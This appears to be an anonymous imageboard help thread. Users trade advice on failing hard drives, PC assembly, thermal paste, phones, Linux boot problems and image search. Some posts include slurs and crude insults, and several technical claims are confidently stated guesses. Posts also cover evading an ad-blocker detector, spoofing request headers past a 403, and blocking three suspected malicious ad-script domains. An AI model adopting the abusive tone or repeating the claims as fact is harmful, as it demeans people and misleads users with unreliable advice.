Current pending sectors means sectors that are damaged but still in use and not removed yet.
Hover your mouse over the caution button.
Your HDD is going FUBAR, dont use it for important stuff but stuff like secondary or temporary storage, like torrent downloads.
>>
>>64295660
If they are not showing in speccy download HWMonitor.
>>
>>64295679
Thanks again, anon.

>Hover your mouse over the caution button.
Pic related.

>Your HDD is going FUBAR, dont use it for important stuff but stuff like secondary or temporary storage, like torrent downloads.
It's the hard drive in my laptop so I guess I'll have to replace it pretty soon as I need it for every day use. Fortunately I do have everything backed up on an external hard drive (and also on a second one).
>>
>>64295614
Thank you so much.
>>
>>64295641
nigga how is that drive even still showing up
>>
>>64295661
I still have it. What does it even for?
>>
File: 1503186655726.png (6 KB, 469x131)
6 KB
6 KB PNG
>>64295691
i have HWMonitor, but i don't know what that would be under. this is the only thing i see that's somewhat similar to what you mentioned.
the motherboard section shows the same parameters as speccy in regards to voltage.
>>
>>64295747
Christ, I figured it was bad but not THIS bad lel
>>
File: 1488370212620.jpg (18 KB, 300x291)
18 KB
18 KB JPG
>>64295763
>What does it even for?
>>
>>64295781
>reported uncorrectable error
Ive never seen a number that high
>>
8.1 or 10?
>>
Best Linux distro for an old Netbook?
>>
>>64295954
>>
>>64289724
>>64293170
>using the smiley with the carat nose
>>64293170
>>64289460
>using a picture of the smiley with the carat nose
>>
FFS hiroyuki is again playing around with external scripts.

What the fuck is his plan?
>>
File: Richard_Stallman.jpg (79 KB, 772x638)
79 KB
79 KB JPG
What Linux distro does he uses?
>>
>>64295954
8.1 is more similar to 7 than 8.1 is to 10

8.1 is fine and mostly like an upgraded 7 but i wouldn't recommend 10 to anyone
>>
File: 1465955350133 (1).jpg (67 KB, 709x765)
67 KB
67 KB JPG
>making babbies first website
>have no idea where to start
please save me time /sqt/. whats the ubuntu of website languages?

currently have an apache web server up and running and it displays index.html but that's all i can do
>>
File: 74hc595n-dscn3898.jpg (35 KB, 800x600)
35 KB
35 KB JPG
what would cool an IC better, a dried-up slab of paste or two pieces of thermal pad stacked together?

I know both options are shit
>>
>>64296150
>have an apache web server up and running and it displays index.html
congratulations, you're done
>>
>>64296165
-- with a heatsink on top, right?
>>
>>64296197
it's touching the metal shielding
>>
>>64296179
alright so i have to learn html?
>>
>>64296213
use a thermal pad, then
dried paste will likely be a negative, since there'll be gaps and cracks once you remove the original heatsink
clean it off before placing the pad
>>
does anyone else get this error while converting in VLC? if so, how do you fix it?
>>
>>64296234
is it ok to stack two of them, though?
I need 3mm ones and I only have 1.5mm
>>
objectively speaking (and ignoring bland phone design)

How is Apple v Android this past year? Security wise, UI wise, etc. Yeah Apple is closed source and Android is open source, but what else is there?

I'm tin-foiling hard here ever since google mini's/amazon alexa's started selling like hot cakes. I'm considering switching to an iShit just to test the waters out, even with the whole throttling fiasco normies are REE'ing about.

Have owned: Galaxy S3 (shittiest piece of technology I've ever owned), HTC M8, Nexus 5, Galaxy S7 Active (1.5 years in and it's a laggy POS every other day, and battery has gone to shit). Only liked the nexus 5 experience.
>>
>>64296418
I just happened to be looking at this if you want to try your hand at it:
https://wiki.installgentoo.com/index.php/Android_ricing

As an iFag I'd say Apple has a security edge for numerous reasons. The UI is simpler which I also like. Just go try one out in person and see what you think.
>>
File: rZCEYU.jpg (367 KB, 700x622)
367 KB
367 KB JPG
If a standard doesn't have enough bandwidth, why not output the signal through two cables instead of one?
>>
>>64296418
>>64296580

I've always wanted to try my hand at rooting and stuff, but I don't come from a programmer background and have less time to play around with tech by the year. I don't even know how to load an apk on my phone for apps not available in the play store.

The extent of my phone knowledge is OS features/updates, and am probably as "normie" as one can get. I only use my phone for communication, google maps, and media (without gaming). Basically use my phone to make my life a bit easier on organization for grad school.

How are widgets on iOS? I have a calendar and email widget on my homepages to keep track of my day easily, and the only notifications I really focus on are text and email.
>>
File: 783ymnrv.png (51 KB, 850x178)
51 KB
51 KB PNG
I'm using blender and can't export

H E L P
>>
>>64296714
>probably as "normie" as one can get
You definitely want an iPhone then. Wait for the next iPhone SE if you want a cheap, small phone, otherwise get a used/refurbished 6S or above.

As somebody who's used both, the iPhone is the one that just werks.
>>
what's the easiest, tard-proof way to use a laptop as a monitor?
>>
>>64296852
How are widgets on iPhone though? can I have a month-view calendar widget? or a mail inbox widget?
>>
How do I get rid of the ads on this bitcoin faucet site and still collect my free satoshi shekels? This screen bypasses both ublock Origin and the anti-ablock killer scripts I have installed (Adsbypasser and Reek's Anti-Adblock Killer)
>>
>>64297070
Not with the built-in apps, but you should be able to find something. I don't use those so that's the best answer I have. You should be able to find something online tho.
>>
>>64297116
Have you updated your blocklists?
>>
>>64297148
hmm. Alright, thanks then. I'll see if a friend lets me play around with their phone before I decide if to ditch the S7 and Android. I'll missed being able to switch default apps though.
>>
File: 1459717078824.jpg (27 KB, 315x315)
27 KB
27 KB JPG
How can I tell if I've been affected by Hiroyuki's malware domain shenanigans? Is this even still an issue? I haven't noticed any ads slipping through my blocker, and no suspicious domains appear in my noscript list...
>>
>>64291476
Fucking useless thread. Literally every single time I ask something, I get no response unless I double bump it or beg. What's the point if I can't even get a "I don't know, but try this"?
>>
>>64297253
Probably other header fields. No idea what a wget request looks like, but you could try looking up and adding common fields like content-type or accept-encoding.
>>
>>64297307
Ok, thank you. I assumed as much, but beyond --header="Accept: image/jpg", I don't know what else it's looking for, as I have both that and the User Agent set, but it still throws me the 403. I'm hoping somebody already knows what parameters it's looking for in the browser.
>>
>>64297157
Aaaand that did it. Feel kinda dumb now.

Thanks dude.

>>64297223
I'd say if you're not getting any ads, and the page still loads properly even if you have the

amgload.net/*
piguiqproxy.com/*
smcheck.org/*

scripts blocked, I wouldn't worry about it.
>>
So I got apache serving on port 80 on a virtualbox machine connected to my windows 10 host using NAT. Everything works great in the guest. I set up port forwarding (80->80) in virtualbox, and now I can go to localhost and get my content in the host OS as well.

However, when I use my local IP address (192.168.0.27), I just get a blank page with 404. How come? Could my router be firewalling requests to port 80 even within the LAN?
>>
>>64297223
>Is this even still an issue?
I came back in early January and it was gone. Anons told me it had been there until shortly before.
Anyway, it hadn't been an issue since then, but today I had a few page loads where those scripts were back.
No idea what he is attempting to do, but it's probably no good. If only moot was still here.
>>
File: 1512940528931.png (185 KB, 1671x1013)
185 KB
185 KB PNG
>>64297334
This is a case of RTFM I'm afraid. Try using the debugger in your browser (F12) to view the network request you're sending and try copying that, pic related
>>
>>64296739
>>>/3dcg/
>>
>>64297411
You mean >>>/3dpd/
>>
File: DJNN_xJWAAAvVi5.jpg (66 KB, 618x506)
66 KB
66 KB JPG
>>64297344
>>64297357
Strangely enough, after refreshing this page, I found two of them (amgloag and piguiproxy) in my NoScript domain list for the first time. Luckily they're blocked by default, but I went ahead and manually blocked them just for some sense of satisfaction.

Thanks, anons
>>
>>64297384
Hmmm, ok cool. Never used the debugger before, but this should be helpful. THank you.
>>
>>64297427
3dpd is for real life. 3dcg is kinda 2.5D so it's fine.
>>
File: 1513455245689.jpg (212 KB, 1218x1015)
212 KB
212 KB JPG
approximately how much is enough to do backup on a new pc? 32 gb?
>>
Any advice for transplanting an OS from it's home on a HDD to an SSD? The EVOs I have came with their own form of transfer software. Should I be looking for a different piece of software. Acronis was my first thought. Any big Do's or Don'ts that come to mind?
>>
If coming from i3, which is the best DE?
Mostly looking for proper workspaces similar to i3
>>
is there some kind of wireless broadband service you can buy for your laptop so you c an like go out in the middle of bumfuck nowhere and be connected?
>>
File: 2w34r23r23.png (47 KB, 449x467)
47 KB
47 KB PNG
Can anyone help me get a more stable 1400mhz overclock on my Rx 480? I'm using Sapphire Trixx. Msi gamingx model card.
I'm completing multiple consecutive passes of Heaven benchmark, and there seems to be no artefacting, stuttering, etc. But I am crashing in games after an hour or two. Notably Doom (vulkan) and Overwatch.
I'm on the Adrenalin driver, installed after DDU.
>>
I'm having a really strange problem with a lubuntu machine and was hoping someone knew what the fuck to do about it.

So I updated to 16.04 recently, and ever since that happened my computer will boot up to the "CPU Scaling" portion of the boot sequence and then just stop. Literally stop. Power goes out and no logs are saved which clue in to what happened. It's so violent that it affects the CMOS of the computer, an I have to reset it every time that happens.

I've ran every single recovery option in GRUB aside from nuking the operating system. LiveCD has no introspection as to what is going on. It was working fine before I updated last week.

Any idea what is happening and what I should do?

in b4 install Gentoo. I'm okay with going to another OS if people have suggestions. I haven't tried Arch yet, but this is a fairly old computer and needs to be kept lightweight.
>>
>>64289460
>carat
Technically, that's a greater than nose. 󠄆 ̇͜>̇
>>
>>64294834
hard drive shitting itself
>>
File: 456346345.png (516 KB, 1039x780)
516 KB
516 KB PNG
>>64297588
Trixx settings. Also, I wasn't having a lot better luck in MSI afterburner. The card didn't want to go much over 200w in afterburner.
>>
What's the best software for playing Blu-Ray movies on Windows 7?
>>
File: Captura.png (29 KB, 455x335)
29 KB
29 KB PNG
WHY THE FUCK THE PIECE OF SHIT GOOGLE IMAGE SEARCH DOESN'T WORK?

I'm really fucking tired, everytime I search a picture it instead search the THUMBNAIL of the picture
>>
File: crystaldiskinfo.png (41 KB, 673x409)
41 KB
41 KB PNG
>>64297612
See, I doubt that because my OS is installed on my SSD and games are on my HDD. But here's my crystal disk info anyway.
>>
>>64297699
My OS and browser, I should have said.
>>
I'll use an anti static wrist band for my first pc build. What do I attach the crocodile clip to?
>>
Am I missing something obvious?
What's the point of Maven if it gets all the dependencies, and then I also need to manually set them up so the project actually has them at runtime?
>>
>>64297584
there are laptops and routers with sim card slots, if you wan't to go somewhere without a cell network there's probably satellite internet devices you could buy
>>
openmediavault is a huge bitch (i blame debian) and i'm looking for a server that'll run deluge and emby. what operating system should i be using? i know nothing about virtualization, all i know about is freenas/omv/unraid

should i use centos?
>>
Hey I narrowed by problem down.
The LiveCD I tried booting also caused my computer to stop.
Now I need to search for hardware issues, but how do I do that? Where do I even begin?
>>
How do I learn programming languages? I mean HOW, I'm learning C++, I start making something with it that's beyond a shitty hello world program, and I always get stuck. Is there a way in which we absorb every aspect of the language?
>>
>>64297860
Just keep trying to make stuff, that's what I did. I gave up a lot in the early days but I kept at it and figured it out.
>>
How the fuck do I learn how to build computers safely with zero risk? I don't want to spend thousands on parts then screw something up and destroy the part somehow.
>>
>>64289460
Back in Windows I used to work with simple batch files for webm conversion, file renaming, etc. Now I want to recreate those with shell scripts.
I already got how to translate the most basic commands, but I'm stuck when it comes to the parameter extensions that I worked with (e.g. I used %%~nG to get the filename of %%G without the extension or %%~xG only for the extension). Is there an equivalent for unix shell scripts?
>>
>>64297923
>How the fuck do I learn how to build computers safely with zero risk?
There's no such thing as "zero risk", but building a computer is pretty close as long as you're capable of following the instructions and don't do anything stupid.
>>
>>64297923
It's mind-numbingly easy. I had a friend help with my first one because I was also nervous, but any of the billions of youtube guides could replace that.
>>
>>64297923
I put mine together with about zero knowledge beforehand, following some guide with pictures I found online and reading the manuals where necessary. Everything went fine first go and it only took me like 2-3 hours because I was going really slow and double checking everything I did. If you can put together a box of legos following the little instruction manual, you can do this.

Also
>spend thousands on parts
What kind of monster are you making, anon?
>>
How much life does a motherboard have left when the capacitors start to leak? Should I be looking for replacements right now or is there no big rush?
>>
File: pron.png (14 KB, 363x481)
14 KB
14 KB PNG
about to switch laptops, planning on making a backup of some shit i have on my hard drive so i can factory reset

should i keep this or no
>>
>>64297904
But that takes forever and its so discouraging, I was making a simple website in react recently, got so frustrated, haven't worked on it in weeks. I don't even know what went wrong.
>>
>>64298011
It mostly causes instabilities problems and BSoD, but it can also fuck your CPU, so replace as soon as you can.

>>64297826
Any distro with docker might help, including debian and FreeNAS.
>deluge
Deluge doesnt scale well, consider using transmission with the WebUI
>>
>>64298039
>>64297904
And this in fucking javascript, C++ is even worse
>>
>>64297806
can you list me some? is cell broadband any good?
>>
>>64298049
my main reason to use deluge is the built in socks5 proxy, but i suppose i could route an entire container through a proxy. thanks, will look into docker.
>>
>>64297352
So I just gave up and used a bridged network instead. It's working now, although for some reason my shitty router doesn't acknowledge its existence among "connected devices" (but I can access it from anywhere in the LAN which is the important part).
>>
>>64297757
Any unpainted metal surface should do.

I'm going to warn you now, the sound the CPU lever makes when it's pushed down is going to haunt your fucking dreams.
>>
how do i stop xubuntu 16.04 from screen tearing on my w520?
>nvidia-settings --assign CurrentMetaMode="nvidia-auto-select +0+0 { ForceFullCompositionPipeline = On }"
doesnt work
>>
>>64297860
Stuck how? As in you don't know how to do something? Or there's a weird bug you can't fix?
In the first case, you won't know shit when you start, so MOST of your time will be spent looking through docs and trying stuff out from there. Experimenting, learning. That's completely normal.
In the second case, did you spend a reasonable amount of time properly debugging using helpful tools? Debugging is a skill, too; I have seen people who get an incorrect output, then stare at their screen in despair because they don't know what's causing it. Now, there are definitely errors which are extremely hard to debug, but these are mostly related to timing (not an issue with single threads) or outside influences (only really an issue in complex systems where you have a bunch of stuff communicating - shouldn't be a problem in simple learning stuff).

If you've spent like an hour stepping through your program with a bunch of breakpoints and verified that every value looks correct, or otherwise can't identify where stuff goes wrong, then post in /dpt/ and go cry yourself to sleep.
>>
>>64298143
>the sound the CPU lever makes when it's pushed down is going to haunt your fucking dreams
Can confirm. It might also be way harder to push in completely than you expect. I remember thinking I was for sure going to break something when I did this part the first time, what with the pressure I needed to put in and the sound it was making.
>>
>it still isn't fixed
https://github.com/qbittorrent/qBittorrent/issues/8200
>>
My wifi got extremely slow, about ~50KBps with it dropping every few seconds to minutes.
I've tried resetting my router plenty of times, but the only way to get devent speeds is to use a wireless repeater and connect via ethernet.
What could it be or what's a good(no "reset router, check if your pc is on, check if planet X isn't interfering") guide to help me.

Also, I can't plug anything else but a Bluetooth dongle and everything that's usually plugged in (mouse, keyboard, etc.) in my pc. And if I do and replug the mouse or keyboard, it won't connect until I remove for example the USB drive. It's driving me nuts as I was just trying to make a manjaro usb to replace windows.

Is this all windows sabotaging me by slowing my network to a crawl and refusing any USB storage just so I keep using windows?
>>
I've been looking at 1080ti cards and was checking out eBay for some. Is there a reason for the giant price difference between these 2? I feel like I'm missing something. Links shortened to avoid spam detection.

http://ebay.to/2DdXsKo

http://ebay.to/2mBJatv
>>
What's a good china tablet if I want

>good battery life
>expandable storage
>durable
>ok performance
>IPS screen

Currently looking at this one but theres a lot of complaints about battery life

https://www.amazon.com/dp/B01H3B17R8/ref=psdc_1232597011_t1_B01MYZEPGP

Will be taking the tablet overseas and around the world
>>
>>64294966
self-bump, i need some help deciding
>>
I am considering running Linux with pci passthrough to a Windows VM. I need a second graphics card installed (I already own the second card) but my concern is about my powersupply. I'm currently running a 750 watt PSU with a Nvidia 1070 Ti and would like to install my old 750 Ti as the second card. How do I determine if the PSU is up to snuff?
>>
>>64298063
google it yourself, I only know of one, my dad had an hp laptop with a sim card so he could work from anywhere if he wanted, that was a few years back and worked just fine. As for the connection speed idk, whatever you can get on a phone should be doable on a laptop too I suppose
>>
>>64289646
>can't have webm thumbnails.
which player can do this? I have so many unlabeled webm’s
>>
>>64298259
I have bough no name Chinese tablets before, they are trash, ask on the >>>/g/csg/ thread for a good brand like redmi, huawei or zte.

>>64294966
First one with a good MB, so you can reuse it for Ryzen+

>>64298299
Google PSU calculator, but also consider that only one GPU will be under load and one at idle.
>>
>>64297962
What exactly do you mean by "anything stupid"? That's the stuff I'm afraid of

>>64297985
Yeah I don't really have any friend who can help me out. The guys I know are really software guys. Do you know of any really detailed videos that explain things in a really detailed manner instead of just being indtructions? I want to get a grip on what everything is and why so that I can understand what I'm doing and tell when something's wrong. I'm especially nervous about power sockets and CPU pins, I look at those guts/gore pictures and I literally picture myself fucking up an expensive CPU trying to put it on the socket.

>>64298004
Can you please outline the list of things that you felt was important enough to double check and make sure you did correctly?

Anyway, I always buy the best parts I can get my hands on, the idea is they will be good for a long time. My old Q6600 is still passable even today. When I was younger I'd optimize for games, nowadays I'm trying to optimize for network and drive I/O performance as well as storage capacity but I'm of the philosophy the computer should be able to do literally everything and should have all sockets filled with something useful.
>>
File: file.png (1.2 MB, 1280x800)
1.2 MB
1.2 MB PNG
look at this shit why is ncmpcpp rendering like shit with my custom config on the left? I just added two custom fonts, removed the border and added padding. in the bottom right corner xterm launched without custom options
>>
>>64298379
>Can you please outline the list of things that you felt was important enough to double check and make sure you did correctly?

Keep in mind that I'm just a scrub who build mine for gaymen. But one thing I made sure was the order of what to put in first so everything would fit right and I wouldn't have to demount something afterwards because it blocked the way to something else. Also, when applying the past and heatsink I made sure I knew how everything was oriented so I could do it smoothly. Cable management and making sure everything is connected to the right thing was also something I was worried about.

Also don't forget to plug in the power AND flip the power switch when you first try to turn it on. I got a little heart attack when it wouldn't power up and I thought I fucked up, but I just forgot to flip the switch at the back. I am, truly, the dumbest boy alive.
>>
File: 1504218437240.png (9 KB, 515x442)
9 KB
9 KB PNG
>>64291495
Fuck yeah man
>>
>>64292682
Maybe you have extreme gore and/or scat and/or worse sex wallpaper for your desktop and is reason for vomiting. Change disgusting wallpaper and see if problem is resolve.
>>
>>64291176
If you're just gaming, just get Windows 10. I use it for my rig when I game, but I have a dual boot option with Ubuntu, because I didn't feel like fiddling with distros, window managers, desktop environments, yadda yadda. I use the Linux portion for coding for my classes, other things like browsing the web, and all that good shit.
>>
>>64298379
>What exactly do you mean by "anything stupid"?
Anything common sense forbids. If something doesn't seem to fit, check if it's supposed to go in like that and don't just try to force it. Handle each part with care and don't toss it around. Don't let your cat/dog near the whole thing while you're building it.
Stuff like that.
>>
>>64298413
ok it was that -cjk_width shit, no need for it if you have cjk fonts to add along with your main font just use -fd for it
>>
File: softwareengineer.jpg (52 KB, 640x480)
52 KB
52 KB JPG
My friend is good with computers and a neet, so I suggested he try to get some certs and apply to a helpdesk or an entry level sysadmin job.

He started asking me about what certs I thought were worth it, but I actually have no idea what the industry is looking for. I only ever got an A+ cert while working helpdesk at school years ago.
>>
>>64297070
No widgets on iPhone. Have to wait until Apple invent iWidgets and everyone applauds.
>>
I'd like to learn how to program in Python 3, but I am using a chromebook. Once I have downloaded crouton, how do I download python 3?
>>
>>64298745
Odds are you already have python3, just open up your terminal and type in "python3" and see if it starts up. Otherwise "sudo apt-get install python3" should do it.
>>
>>64297384
So this is weird. I've copied pretty much every request header, character for character, both in different combinations and all at once, and I STILL get the 403 through wget, yet am able to access through browser just fine.

This is is telling me it's looking at something beyond the request headers, but i have no clue as to what.

Here are the RH values btw

*Fucking Spam Filter*
>>
>>64298600
How to properly handle parts? Do I treat them like CDs, manipulating them by the edges and stuff like that? Do I buy anti-static gloves?

Also what about bigass parts like GPU and heatsinks? They look like they're going to pull the motherboard down with them. I looked it up and it seems they literally sag. How to avoid this?

>>64298469
Oh god that thermal paste. How much do you apply? Writeups I googled were wildly conflicting, some say 1 droplet, others say that's too much, others put more paste.

I really wanted to make a fully water-cooled computer because it's simply more efficient but I'm guessing it's way above my skill level now. I saw some gigabyte GPUs that come with built-in watercooling though snd they look nice.
>>
>>64298011
leaking capacitors on mobo will eventually prevent your pc from turning on
>>
What's the secret code word to get the cable company to give me a better deal?

Spectrum tells me my Time Warner Cable promo pricing is ending and they don't do promos, bill is going to go up $50.
>>
>>64298839
I’ve never bothered with gloves. I usually just rest the components on their anti static bags or on newspaper, or just the table. Built about 5 pcs never had a problem with static, but if you get a lot of static in your house then use gloves.
>>
>>64298872
Demand to speak with their loyalty department, if they have one. I do that for centurylink and have discovered they're pretty much the department that wields actual power to get shit done.
>>
>>64298872
Threaten suicide and cry a lot.
>>
>>64298839
Yeah, handling them like CDs is actually a good comparison. As for the GPU, it's not just connected to your motherboard, but the case as well. You plug it in and connect it via the back of your case with screws.

Also don't go for watercooling. It's unnecessary unless you want to build an overpriced monster PC. I built mine three years ago and only used the stock fan and it's still going strong.
>>
>>64298872
Is cable really that much of a deal in the US?

>paying for ad-infested TV
Fucking retarded.
>>
>>64298839
>Oh god that thermal paste
I went with a drop the size of large pea in the middle. It's worked perfectly fine so far, but I'm no expert here.
>>
>>64297685
Google removed their image search engine and changed it for a shitty AI one.
This is why you get shit now.

Use Yandex.
>>
File: Captura.png (76 KB, 559x513)
76 KB
76 KB PNG
>>64299273
how the fuck is a shitty russ...

>it works
oh fucking A, thanks anon
>the same picture was not found
fuck my life
>>
>>64299380
Its lewd, could you post the image here so i can search it for you?
Also disable safe search.
>>
File: sauce.jpg (354 KB, 1500x2064)
354 KB
354 KB JPG
>>64299395
>safe search
ah, it was so obvious, but here you go anyway
>>
>>64299414
This is jap stuff, so it was uploaded to Pixiv, twitter or a booru.
This means you can use IQDB or Saucenao to search for it.
If you have 4chanX you can just click the iqdb button and it will search it for you.
it will link to a booru, in the booru you can find the source link, which is usually the artist twitter, pixiv or nico account.

Example, using the iqdb button links me to:
https://iqdb.org/?url=https%3A%2F%2Fi.4cdn.org%2Fg%2F1515875180020s.jpg
Which links me to:
https://danbooru.donmai.us/posts/2898267
Which links me to:
https://twitter.com/waterkuma0/status/921320586747330560
Which its the source.
>>
>>64299444
I don't have 4chan X, since I don't really know the advantages of it, but the site itself allows me to do a IQDB search
thing is that it also allows for a google search and that's what was making me go mad, I though that something was up with my browser, but then you said that its Goggle being a piece of shit, so I'll use IQDB from now on
thanks anon for all your help
>>
>>64299444
>>64299414
Yandex is for Manga pages.
IQDB is for illustrations.
Saucenao is for illustrations for stuff that never hit the boorus for some reasons (Such as loli, cropped, etc).
Panda is for well sadpanda stuff and to translate panda links (Show the link title and tags instead just the link).
WAIT is for anime.
Install 4chanX, CCD0 fork to be exact, it makes the site more comfortable and easy to browse once you set it up.

Google has been forcing his AI software on everything, Captcha, images, maps, etc which sucks.
Image related, AI captcha which takes ages to solve.
>>
>>64297594
Update: I can boot into a live CD. Anything I can do to recover my OS or should I write it off as a loss and reinstall everything?
>>
>>64299490
Also 4chanX lets you search the archives in case you cant find it but someone has posted the source before in any board.
>>
File: pic.png (1.93 MB, 1288x857)
1.93 MB
1.93 MB PNG
>>64289646
>I can't click the screen to pause or no button to switch to next video or can't
Literary the reason I created pic related
I will make some better looking controls and implement a config ...one day
>>
>>64299534
>AI captcha which takes ages to solve.
thank fucking God regular 4chan already allows you to use legacy captcha
>>
>>64299558
Which is getting killed this march because it got cracked so you can skip it.
Bots have been abusing this for months, this is why you cant create threads using the old captcha anymore.
This is why /qa/ and /vg/ have huge bot problems.
/pol/ has a bot problem too.
>>
>>64299558
Google will disable it in a few months though
So you have to spent a minute slowly clicking 30 images before you can post
>>
>>64299580
>>64299579
why can't we have nice things
>>
call me a retard, but i tried installing 4chan x by downloading the .crx file from github and this thing shows when I try to open it in firefox
>>
File: Captura.png (4 KB, 371x131)
4 KB
4 KB PNG
>>64299629
>>
File: 1500110867139.jpg (61 KB, 533x751)
61 KB
61 KB JPG
>>64299629
>call me a retard, but i tried installing 4chan x by downloading the .crx file from github and this thing shows when I try to open it in firefox
unironically, you're retarded
>installing a crx in firefux
>not reading the instructions
i shiggy diggy
>>
>>64299629
Install greasemonkey first.
>Why
Firefox devs ruin everything so you need this.
>>
>>64299554
good taste anon
>>
>>64299692
>"there is a readme file?"
>readme.md
>.md
>I need to download a different fucking program just to read it
why can't it be something fucking normal like a notepad?
>>
>>64299843
Are you even serious now
>>
>>64299843
>readme.notepad
>.notepad
>linux users need to download a virtual machine and buy a copy of windows and install it just so they can run notepad to open it
>>
File: downloadfile.jpg (53 KB, 470x556)
53 KB
53 KB JPG
i have a galaxy J36v. It is on an active plan with Verizon.

My friend has an IPhone 6s that is not on a contract, but was an at&t phone, and he sent in an "unlock request" through the At&t service that will be completed in 2 days. once the service is completed, will I be able to put in my active Verizon sim card in it and have it function properly? the sim cards are the same size.

if this won't work, what can I do? my galaxy is about to die.

pic related is the phone he's giving me
>>
>>64299888
I've never encoutnered a file like that because I never work with computers
I though I was allowed to be computer illiterate in this and only this fucking thread, do I have to know fucking everything?
but better yet, why the fuck are you wasting time? I fucking hate people like you, you perfectly know that the answer is "I asked this because I don't know" why the fuck would I be psoting here anyway

>"I have this problem because I have no fucking idea of computers"
>"wow, how can you have that problem? are you even serious? Is like you have no fucking idea of computers"
for fuck's sake
>>
Okay guy with power problems here again.
I took out the graphics card and the computer seems to be running just fine. So how can I tell if the problem was the graphics card or if the problem was the power supply/inability for the computer to supply enough power to run the card?

Is there some kind of power test I can do which would strain the power supply when I have no graphics card in it? Keep in mind this was not a powerful card. It was the Geforce 210 desktop graphics card.
>>
>>64299959
Go to the github page and read it there or
open readme.md with notepad, you will be able to read it.
If you at least would have tried to solve your problem, you wouldn'd had to ask
>>
>>64299843
Reminds me about one site that had the winrar installer inside a .rar file.
>>
>>64300022
to be honest I did figure that out some seconds after making that post, I got triggered because of the condescend
>>
Is it rational for me to still hate Windows 10? I ran into almost every bad experience someone could have with it.
>>
>>64300333
yeah, my fault. I could have been more helpful in the first post
>>
>>64300421
thanks for being so understanding, and thanks for the help
>>
>>64299953
pls respond

Delete Post: [File Only] Style:
[Disable Mobile View / Use Desktop Site]

[Enable Mobile View / Use Mobile Site]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.